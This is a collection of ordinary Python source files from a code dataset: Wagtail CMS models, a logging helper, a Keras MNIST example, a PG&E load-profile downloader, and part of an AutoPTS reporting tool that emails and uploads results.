Site1Tag.objects.order_by(\"tag\")\n for tag in tags:\n if tag.tag.name not in tagList:\n tagList.append(tag.tag.name)\n tagList.sort()\n context['tags'] = tagList\n side(context)\n return context\n\nclass Site1QueryTag(Page):\n\n def get_context(self, request):\n # Filter by tag\n tag = request.GET.get('name')\n blogpages = Site1Post.objects.filter(tags__name=tag)\n\n # Update template context\n context = super().get_context(request)\n context['blogpages'] = blogpages\n side(context)\n return context\n\n#this page will display raw html files as body\nclass Site1RawHtml(Page):\n file_name = models.CharField(max_length=255)\n\n content_panels = Page.content_panels + [\n FieldPanel('file_name', classname=\"full\")\n ]\n\n# search_fields = Page.search_fields + 
[\n# index.SearchField(''),\n# ]\n\n def serve(self, request):\n context = super().get_context(request)\n\n #name = \"codeberry.html\"\n name = self.file_name\n\n base = os.getcwd()\n path = \"site1/\" + \"static/site1/pages/\" + name\n\n f = open(path, \"r\")\n body = f.read();\n f.close()\n\n side(context)\n\n return render(request, 'site1/site1_page.html', {'body':body})\n", "repo_name": "mihai2014/wagtail-multi-blog-sites-with-bootstrap-4", "sub_path": "site1/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 8221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "wagtail.core.models.Page", "line_number": 44, "usage_type": "name"}, {"api_name": "wagtail.core.fields.RichTextField", "line_number": 45, "usage_type": "call"}, {"api_name": "wagtail.core.fields.StreamField", "line_number": 47, "usage_type": "call"}, {"api_name": "wagtail.core.blocks.RichTextBlock", "line_number": 48, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 48, "usage_type": "name"}, {"api_name": "wagtail.core.blocks.TextBlock", "line_number": 49, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 49, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page.content_panels", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 52, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 53, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.StreamFieldPanel", "line_number": 54, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page", "line_number": 65, "usage_type": "name"}, {"api_name": "wagtail.core.fields.RichTextField", "line_number": 66, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page.content_panels", "line_number": 68, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 68, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 69, "usage_type": "call"}, {"api_name": "taggit.models.TaggedItemBase", "line_number": 81, "usage_type": "name"}, {"api_name": "modelcluster.fields.ParentalKey", "line_number": 82, "usage_type": "call"}, {"api_name": "django.db.models.CASCADE", "line_number": 85, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 85, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 90, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 90, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 91, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 91, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 92, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 92, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 94, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 94, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 98, "usage_type": "call"}, {"api_name": "wagtail.images.edit_handlers.ImageChooserPanel", "line_number": 99, "usage_type": "call"}, {"api_name": "wagtail.snippets.models.register_snippet", "line_number": 89, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 108, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 109, 
"usage_type": "call"}, {"api_name": "django.db.models", "line_number": 109, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 110, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 110, "usage_type": "name"}, {"api_name": "modelcluster.contrib.taggit.ClusterTaggableManager", "line_number": 112, "usage_type": "call"}, {"api_name": "modelcluster.fields.ParentalManyToManyField", "line_number": 113, "usage_type": "call"}, {"api_name": "wagtail.core.fields.StreamField", "line_number": 115, "usage_type": "call"}, {"api_name": "wagtail.core.blocks.CharBlock", "line_number": 116, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 116, "usage_type": "name"}, {"api_name": "wagtail.core.blocks.RichTextBlock", "line_number": 117, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 117, "usage_type": "name"}, {"api_name": "src.blocks.TwoColumnBlock", "line_number": 118, "usage_type": "call"}, {"api_name": "src.blocks.ThreeColumnBlock", "line_number": 119, "usage_type": "call"}, {"api_name": "wagtail.images.blocks.ImageChooserBlock", "line_number": 120, "usage_type": "call"}, {"api_name": "wagtail.core.blocks.TextBlock", "line_number": 121, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 121, "usage_type": "name"}, {"api_name": "wagtail.core.blocks.TextBlock", "line_number": 122, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 122, "usage_type": "name"}, {"api_name": "wagtail.core.blocks.TextBlock", "line_number": 123, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 123, "usage_type": "name"}, {"api_name": "wagtail.core.blocks.TextBlock", "line_number": 124, "usage_type": "call"}, {"api_name": "wagtail.core.blocks", "line_number": 124, "usage_type": "name"}, {"api_name": "src.blocks.DjangoBlock", "line_number": 125, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page.search_fields", "line_number": 130, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 130, "usage_type": "name"}, {"api_name": "wagtail.search.index.SearchField", "line_number": 131, "usage_type": "call"}, {"api_name": "wagtail.search.index", "line_number": 131, "usage_type": "name"}, {"api_name": "wagtail.search.index.SearchField", "line_number": 132, "usage_type": "call"}, {"api_name": "wagtail.search.index", "line_number": 132, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page.content_panels", "line_number": 142, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 142, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.MultiFieldPanel", "line_number": 143, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 144, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 145, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 146, "usage_type": "call"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 146, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 146, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 148, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.StreamFieldPanel", "line_number": 150, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.InlinePanel", "line_number": 151, "usage_type": "call"}, {"api_name": 
"wagtail.core.models.Orderable", "line_number": 161, "usage_type": "name"}, {"api_name": "modelcluster.fields.ParentalKey", "line_number": 162, "usage_type": "call"}, {"api_name": "django.db.models.CASCADE", "line_number": 162, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 162, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 163, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 163, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 164, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 164, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 166, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 166, "usage_type": "name"}, {"api_name": "wagtail.images.edit_handlers.ImageChooserPanel", "line_number": 169, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 170, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page", "line_number": 174, "usage_type": "name"}, {"api_name": "wagtail.search.index", "line_number": 178, "usage_type": "name"}, {"api_name": "src.tools.PageTree", "line_number": 183, "usage_type": "call"}, {"api_name": "wagtail.search.index", "line_number": 183, "usage_type": "argument"}, {"api_name": "wagtail.core.models.Page", "line_number": 188, "usage_type": "name"}, {"api_name": "wagtail.search.backends.get_search_backend", "line_number": 192, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page", "line_number": 198, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 218, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 226, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 240, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 254, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 255, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 255, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page.content_panels", "line_number": 257, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 257, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 258, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 271, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 280, "usage_type": "call"}]}
+{"seq_id": "70575541529", "text": "# -*- coding: utf8 -*-\nimport logging , sys , traceback2\nimport loghandler\nfrom django.conf import settings\n\nimport os\n\ndef init_log( name = None , screen = False , thread = True ):\n #settings.check( 'LOGDIR' , 'LOGLEVEL' )\n return init_logger( name , settings.LOGDIR , screen , thread )\n\ninit = init_log\n\ndef init_logger( logname , logdir , screen = True , thread = True ):\n logobj = logging.getLogger( logname )\n # 判断是否需要清理\n if logobj.handlers:\n return logobj # 日志已创建,跳过\n# # 有处理句柄,则该日志对象需要清理\n logobj.info( '日志[%s]重新初始化' , logname )\n for hdl in logobj.handlers[:]:\n logobj.removeHandler( hdl )\n \n # 初始化日志文件处理句柄\n fn = '%s.log' % logname\n hdlr = loghandler.DateFileHandler( os.path.join( logdir , fn ) )\n fmts = '%(asctime)s ' + ( 'T%(thread)d ' if thread else '' ) + '%(levelname)s %(message)s'\n formatter = logging.Formatter( fmts )\n hdlr.setFormatter(formatter)\n logobj.addHandler( hdlr )\n \n if screen:\n # 初始化屏幕打印处理句柄\n hdlr = logging.StreamHandler()\n fmts = '%(asctime)s %(name)s:' + ( 'T%(thread)d ' if thread else '' ) + '%(levelname)s %(message)s'\n formatter = logging.Formatter( fmts )\n hdlr.setFormatter(formatter)\n logobj.addHandler( hdlr )\n\n logobj.setLevel( settings.LOGLEVEL )\n return logobj\n\ndef _fmt_msg( *args , **kwargs ):\n if len( args ) > 1:\n msg = args[0] % args[1:]\n elif len( args ) == 1:\n msg = args[0]\n else:\n msg = ''\n \n block = kwargs.get( 'block' )\n if type(block) is str:\n # 是块日志\n bin = kwargs.get( 'bin' , True )\n if bin:\n block = to_hex( block )\n \n if block:\n block = '\\n'+'='*40+'\\n'+block+ ('\\n' if block[-1] != '\\n' else '' ) +'='*40 + '\\n'\n elif msg[-1] == '\\n':\n block = ''\n else:\n block = '\\n'\n \n msg = msg + block\n if msg[-1] == '\\n':\n msg = msg[:-1]\n return msg\n \ndef debug( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n logger.debug( _fmt_msg( *args , **kwargs ) )\n\ndef info( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n logger.info( _fmt_msg( *args , **kwargs ) )\n \ndef warning( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n logger.warning( _fmt_msg( *args , **kwargs ) )\n \ndef error( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n logger.error( _fmt_msg( *args , **kwargs ) )\n \ndef critical( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n logger.critical( _fmt_msg( *args , **kwargs ) )\n\ndef exception( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n exc_msg = traceback2.format_exc( show_locals = True )\n args = list( args )\n if args:\n args[0] += '\\n%s'\n else:\n args.append( '%s' )\n args.append( exc_msg )\n logger.error( _fmt_msg( *args , **kwargs ) )\n return ''\n\nif __name__ == \"__main__\":\n init_log( 'zjxx' , True )\n init_log( 'zjxx' , True )", "repo_name": "chengdg/zjyw", "sub_path": "src/zjyw_utils/log.py", "file_name": "log.py", "file_ext": "py", "file_size_in_byte": 3335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.conf.settings.LOGDIR", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 10, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "loghandler.DateFileHandler", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": 
"call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.settings.LOGLEVEL", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "traceback2.format_exc", "line_number": 98, "usage_type": "call"}]}
+{"seq_id": "74283937687", "text": "from keras.utils import to_categorical\nfrom keras import layers\nfrom keras import models\n\n\"\"\" (MNIST) It’s a set of 60,000 training\nimages, plus 10,000 test images, assembled by the National Institute of Standards and\nTechnology (the NIST in MNIST) in the 1980s. It's like the hello-world of programming in ML \"\"\"\n\nfrom keras.datasets import mnist\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\n\nnetwork = models.Sequential()\n\"\"\" layer is a data-processing module that\nyou can think of as a filter for data. Some data goes in, and it comes out in a more useful form. Specifically, layers extract representations out of the data fed into them—hopefully, representations that are more meaningful for the problem at hand. \"\"\"\nnetwork.add(layers.Dense(512, activation='relu', input_shape=(28 * 28,)))\nnetwork.add(layers.Dense(10, activation='softmax'))\n\"\"\" DENSE means the layers are densely connected (meanse that they are fully connected) \"\"\"\n\nnetwork.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\"\"\" 1: A loss function—How the network will be able to measure its performance on\nthe training data, and thus how it will be able to steer itself in the right direction.\n2: An optimizer—The mechanism through which the network will update itself\nbased on the data it sees and its loss function.\n3: Metrics to monitor during training and testing—Here, we’ll only care about accuracy(the fraction of the images that were correctly classified). \"\"\"\n\"\"\" Before training, we’ll preprocess the data by reshaping it into the shape the network\nexpects and scaling it so that all values are in the [0, 1] interval. \"\"\"\ntrain_images = train_images.reshape((60000, 28 * 28))\ntrain_images = train_images.astype('float32') / 255\ntest_images = test_images.reshape((10000, 28 * 28))\ntest_images = test_images.astype('float32') / 255\n\ntrain_labels = to_categorical(train_labels)\ntest_labels = to_categorical(test_labels)\nnetwork.fit(train_images, train_labels, epochs=5, batch_size=128)\ntest_loss, test_acc = network.evaluate(test_images, test_labels)\nprint('test_acc:', test_acc)\n", "repo_name": "Himanshunitrr/LearningAI", "sub_path": "MNIST.py", "file_name": "MNIST.py", "file_ext": "py", "file_size_in_byte": 2176, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 10, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 10, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 12, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 12, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 15, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 15, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 16, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 16, "usage_type": "name"}, {"api_name": "keras.utils.to_categorical", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "2175484461", "text": "\"\"\"PG&E DLP data access\"\"\"\nimport os\nimport pycurl\nfrom io import BytesIO, StringIO, IOBase\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport numpy as np\nfrom zipfile import ZipFile\n\ndlpurl = \"https://www.pge.com/pge_global/forms/mads/profiles\"\ncachedir = \"__dlpcache__\"\n\nif not os.path.exists(cachedir):\n\tos.mkdir(cachedir)\n\ndef get_remote_file(url,out):\n\t\"\"\"Stream a file from the PG&E data archive\"\"\"\n\tc = pycurl.Curl()\n\tc.setopt(c.URL, url)\n\tc.setopt(c.WRITEDATA, out)\n\tc.perform()\n\tc.close()\n\ndef get_load_archive(year,cache=True,refresh=True):\n\t\"\"\"Copy a DLP archive for a previous year to the cache\"\"\"\n\tzipfile = f\"{cachedir}/{year}dlp.zip\"\n\twith open(zipfile,\"wb\") as zipfh:\n\t\tget_remote_file(f\"{dlpurl}/archive/{year}dlp.zip\",zipfh)\n\twith ZipFile(zipfile, 'r') as zipObj:\n\t\tfiles = zipObj.namelist()\n\t\tfor file in files:\n\t\t\tif file.endswith('.dlp'):\n\t\t\t\tzipObj.extract(file, f\"{cachedir}/{year}dlp\")\n\ndef get_load_profile(date,cache=True,refresh=False):\n\t\"\"\"Copy a DLP for a particular date to the cache and return a dataframe\"\"\"\n\tif date.year < datetime.now().year:\n\t\tget_load_archive(date.year)\n\n\tdatename = date.strftime('%Y%m%d')\n\tif not os.path.exists(f\"{cachedir}/{date.year}dlp\"):\n\t\tos.mkdir(f\"{cachedir}/{date.year}dlp\")\n\tcsvname = f\"{cachedir}/{date.year}dlp/{datename}.dlp\"\n\tif not cache or not os.path.exists(csvname) or refresh:\n\t\twith open(csvname,\"wb\") as csvfh:\n\t\t\tget_remote_file(f'{dlpurl}/{datename}.dlp',csvfh)\n\n\tdf = pd.read_csv(csvname).dropna(how='all').transpose()\n\tdf.columns = list(np.array(df[1:2])[0])\n\tassert(datename == df.index[0])\n\tdf.drop([datename,'Profile','Method'],inplace=True)\n\tdef get_time(date,time):\n\t\tt = time.split(':')\n\t\tt = (24+int(t[0]))*60 + int(t[1]) - 30\n\t\ty = int(date[0:4])\n\t\tm = int(date[4:6])\n\t\td = int(date[6:8])\n\t\tH = int(t/60) % 24\n\t\tM = t % 60\n\t\treturn datetime(y,m,d,H,M,0)\n\tdf['datetime'] = list(map(lambda t: datetime.strptime(datename+\" \"+t,\"%Y%m%d %H:%S\"),df.index))\n\tdf.set_index('datetime',inplace=True)\n\n\treturn df\n\ndef daterange(start_date, end_date):\n\t\"\"\"Obtain a date range\"\"\"\n\tfor n in range(int ((end_date - start_date).days+1)):\n\t\tyield start_date + timedelta(n)\n\ndef get_loads(start,stop,date_format='%m/%d/%y',show_progress=False):\n\t\"\"\"Obtain the loads for a date range as a dataframe\"\"\"\n\tif type(start) is str:\n\t\tstart = datetime.strptime(start,date_format)\n\tif type(stop) is str:\n\t\tstop = datetime.strptime(stop,date_format)\n\tblocks = []\n\tfor date in daterange(start,stop):\n\t\tif show_progress:\n\t\t\tprint(f\"Processing {date}...\",flush=True)\n\t\ttry:\n\t\t\tblocks.append(get_load_profile(date))\n\t\texcept Exception as err:\n\t\t\tprint(f\"ERROR: get_load_profile(date={date}): {err}\")\n\treturn pd.concat(blocks)\n\nif __name__ == '__main__':\n\tget_load_profile(datetime(2019,3,1,0,0,0))\n\tdata = get_loads('3/1/20','3/14/20')\n\tdata.to_csv('test_result.csv')\n", "repo_name": "slacgismo/pgande_dlp_archive", "sub_path": "src/pgande.py", "file_name": "pgande.py", "file_ext": "py", "file_size_in_byte": 2841, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.exists", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": 
"os.mkdir", "line_number": 14, "usage_type": "call"}, {"api_name": "pycurl.Curl", "line_number": 18, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 61, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 74, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 76, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 85, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "29561432875", "text": "import logging\nimport os\nimport re\nimport subprocess\nimport sys\nimport mimetypes\nimport shutil\nimport zipfile\nimport smtplib\nimport datetime\nfrom os.path import dirname, abspath\nfrom pathlib import Path\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\nfrom xmlrpc.client import ServerProxy\nimport git\nimport yaml\nimport xlsxwriter\n\nfrom googleapiclient import discovery, errors\nfrom googleapiclient.http import MediaFileUpload\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\n\nSCOPES = 'https://www.googleapis.com/auth/drive'\nCLIENT_SECRET_FILE = 'client_secret.json'\nREPORT_XLSX = \"report.xlsx\"\nREPORT_TXT = \"report.txt\"\nCOMMASPACE = ', '\n\ndevices_in_use = []\nPROJECT_DIR = dirname(dirname(abspath(__file__)))\n\n# ****************************************************************************\n# Mail\n# ****************************************************************************\n\n\ndef status_dict2summary_html(status_dict):\n \"\"\"Creates HTML formatted summary from status dictionary\n :param status_dict: status dictionary, where key is status and value is\n status count\n :return: HTML formatted summary\n \"\"\"\n summary = \"\"\"Summary \n \"\"\"\n total_count = 0\n\n summary += \"\"\"\n Status \n Count \n \"\"\"\n\n for status in sorted(status_dict.keys()):\n count = status_dict[status]\n summary += \"\"\"\n {} \n {} \n \"\"\".format(status, count)\n total_count += count\n\n summary += \"\"\"\n Total \n {} \n \"\"\".format(total_count)\n summary += \"
\"\n\n if \"PASS\" in status_dict:\n pass_rate = \\\n '{0:.2f}%'.format((status_dict[\"PASS\"] / float(total_count) * 100))\n else:\n pass_rate = '{0:.2f}%'.format(0)\n summary += \"PassRate = {}
\".format(pass_rate)\n\n return summary\n\n\ndef url2html(url, msg):\n \"\"\"Creates HTML formatted URL with results\n :param url: URL\n :param msg: URL description\n :return: HTML formatted URL\n \"\"\"\n return \"{} \".format(url, msg)\n\n\ndef regressions2html(regressions, descriptions):\n \"\"\"Creates HTML formatted message with regressions\n :param regressions_list: list of regressions found\n :return: HTML formatted message\n \"\"\"\n msg = \"Regressions \"\n\n regressions_list = []\n for name in regressions:\n regressions_list.append(\n name + \" - \" + descriptions.get(name, \"no description\"))\n\n if regressions_list:\n for name in regressions_list:\n msg += \"{}
\".format(name)\n else:\n msg += \"No regressions found
\"\n\n return msg\n\n\ndef send_mail(cfg, subject, body, attachments=None):\n \"\"\"\n :param cfg: Mailbox configuration\n :param subject: Mail subject\n :param body: Mail boyd\n :return: None\n \"\"\"\n\n msg = MIMEMultipart()\n msg['From'] = cfg['sender']\n msg['To'] = COMMASPACE.join(cfg['recipients'])\n msg['Subject'] = subject\n\n msg.attach(MIMEText(body, 'html'))\n\n # Attach the files if there is any\n if attachments:\n for filename in attachments:\n file_type = mimetypes.guess_type(filename)\n if file_type[0] is None:\n ext = os.path.splitext(filename)[1]\n print('MIME Error: File extension %s is unknown. '\n 'Try to associate it with app.' % ext)\n continue\n mimetype = file_type[0].split('/', 1)\n attachment = MIMEBase(mimetype[0], mimetype[1])\n attachment.set_payload(open(filename, 'rb').read())\n encoders.encode_base64(attachment)\n attachment.add_header('Content-Disposition', 'attachment',\n filename=os.path.basename(filename))\n msg.attach(attachment)\n\n server = smtplib.SMTP(cfg['smtp_host'], cfg['smtp_port'])\n if 'start_tls' in cfg and cfg['start_tls']:\n server.starttls()\n if 'passwd' in cfg:\n server.login(cfg['sender'], cfg['passwd'])\n server.sendmail(cfg['sender'], cfg['recipients'], msg.as_string())\n server.quit()\n\n\n# ****************************************************************************\n# Google Drive\n# ****************************************************************************\nclass GDrive:\n def __init__(self, cfg):\n self.basedir_id = cfg['root_directory_id']\n self.cwd_id = self.basedir_id\n credentials = cfg['credentials_file']\n\n store = file.Storage(credentials)\n creds = store.get()\n if not creds or creds.invalid:\n path_abs = os.path.abspath(credentials)\n path = os.path.dirname(path_abs)\n\n flow = client.flow_from_clientsecrets(\n os.path.join(path, CLIENT_SECRET_FILE), SCOPES)\n creds = tools.run_flow(flow, store)\n self.service = discovery.build('drive', 'v3',\n http=creds.authorize(Http()))\n\n def pwd(self):\n return self.cwd_id\n\n def mkdir(self, name):\n file_metadata = {\n 'name': name,\n 'mimeType': 'application/vnd.google-apps.folder',\n 'parents': [self.pwd()]\n }\n\n try:\n f = self.service.files().create(\n body=file_metadata,\n fields='id, name, webViewLink').execute()\n except errors.HttpError:\n sys.exit(1)\n\n return f\n\n def ls(self):\n results = {}\n\n page_token = None\n while True:\n try:\n response = self.service.files().list(\n q=\"'{}' in parents\".format(self.pwd()),\n spaces='drive',\n fields='nextPageToken, files(id, name)',\n pageToken=page_token).execute()\n except errors.HttpError:\n sys.exit(1)\n\n for f in response.get('files', []):\n results[f.get('name')] = f\n page_token = response.get('nextPageToken', None)\n if page_token is None:\n break\n\n return results\n\n def cp(self, name):\n if not os.path.exists(name):\n print(\"File not found\")\n sys.exit(1)\n\n basename = os.path.basename(name)\n mime_type, encoding = mimetypes.guess_type(basename)\n\n file_metadata = {\n 'name': basename,\n 'parents': [self.pwd()]\n }\n\n media = MediaFileUpload(\n name,\n mimetype=mime_type)\n\n try:\n f = self.service.files().create(\n body=file_metadata,\n media_body=media,\n fields='id, name').execute()\n except errors.HttpError as err:\n print(err)\n sys.exit(1)\n\n return f\n\n def cd(self, dir_=None):\n \"\"\"\n :param dir_: file object or id of the folder\n \"\"\"\n if not dir_:\n self.cwd_id = self.basedir_id\n elif isinstance(dir_, str):\n self.cwd_id = dir_\n else:\n self.cwd_id = dir_.get('id')\n\n\nclass 
Drive(GDrive):\n def __init__(self, cfg):\n GDrive.__init__(self, cfg)\n self.url = None\n\n def new_workdir(self, iut):\n files = self.ls()\n if iut in list(files.keys()):\n dir_ = files[iut]\n else:\n dir_ = self.mkdir(iut)\n self.cd(dir_)\n dir_ = self.mkdir(datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M\"))\n self.cd(dir_)\n return \"{}\".format(dir_.get('webViewLink'))\n\n def upload(self, f):\n print(\"Uploading {} ...\".format(f))\n self.cp(f)\n print(\"Done\")\n\n def upload_folder(self, folder, excluded=None):\n def recursive(directory):\n with os.scandir(directory) as it:\n for f in it:\n if excluded and (f.name in excluded or\n os.path.splitext(f.name)[1] in excluded):\n continue\n\n if f.is_dir():\n parent = self.pwd()\n dir_ = self.mkdir(f.name)\n self.cd(dir_)\n recursive(os.path.join(directory, f.name))\n self.cd(parent)\n else:\n filepath = os.path.relpath(os.path.join(directory, f.name))\n self.upload(filepath)\n\n recursive(folder)\n\n\n# ****************************************************************************\n# .xlsx spreadsheet file\n# ****************************************************************************\n# FIXME don't use statuses from status_dict, count it from results dict instead\ndef make_report_xlsx(results_dict, status_dict, regressions_list,\n descriptions):\n \"\"\"Creates excel file containing test cases results and summary pie chart\n :param results_dict: dictionary with test cases results\n :param status_dict: status dictionary, where key is status and value is\n status count\n :param regressions_list: list of regressions found\n :return:\n \"\"\"\n\n errata = {}\n\n try:\n with open('errata.yaml', 'r') as stream:\n errata = yaml.safe_load(stream)\n except Exception as exc:\n print(exc)\n\n if errata is None:\n errata = {}\n\n header = \"AutoPTS Report: \" \\\n \"{}\".format(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\"))\n workbook = xlsxwriter.Workbook(REPORT_XLSX)\n worksheet = workbook.add_worksheet()\n chart = workbook.add_chart({'type': 'pie',\n 'subtype': 'percent_stacked'})\n\n # Add a bold format to use to highlight cells.\n bold = workbook.add_format({'bold': True})\n\n # Write data headers.\n worksheet.write('A1', header)\n worksheet.write_row('A3', ['Test Case', 'Result'])\n\n row = 3\n col = 0\n\n for k, v in list(results_dict.items()):\n worksheet.write(row, col, k)\n if k in errata:\n v += ' - ERRATA ' + errata[k]\n worksheet.write(row, col + 1, v)\n if k in list(descriptions.keys()):\n worksheet.write(row, col + 2, descriptions[k])\n if k in regressions_list:\n worksheet.write(row, col + 3, \"REGRESSION\")\n row += 1\n\n summary_row = 2\n summary_col = 5\n\n worksheet.write(summary_row, summary_col, 'Summary')\n end_row = summary_row\n for status in sorted(status_dict.keys()):\n count = 